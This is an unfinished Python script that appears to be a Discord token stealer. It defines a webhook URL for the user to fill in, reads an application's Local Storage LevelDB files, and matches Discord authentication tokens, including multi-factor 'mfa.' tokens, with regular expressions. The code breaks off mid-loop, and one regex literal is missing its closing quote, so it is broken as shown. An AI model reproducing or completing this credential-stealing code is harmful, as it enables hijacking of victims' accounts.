import os
import re
import json

from urllib.request import Request, urlopen

# paste your webhook url here
WEBHOOK_URL = 'your webhook url'

PING_ME = False

def find_token(path):
    path += '\\Local Storage\\leveldb'

    tokens = []

    for file_name in os.listdir(path):
        if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
            continue

        for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27} , r'mfa\.[\w-]{84}'):
                for 
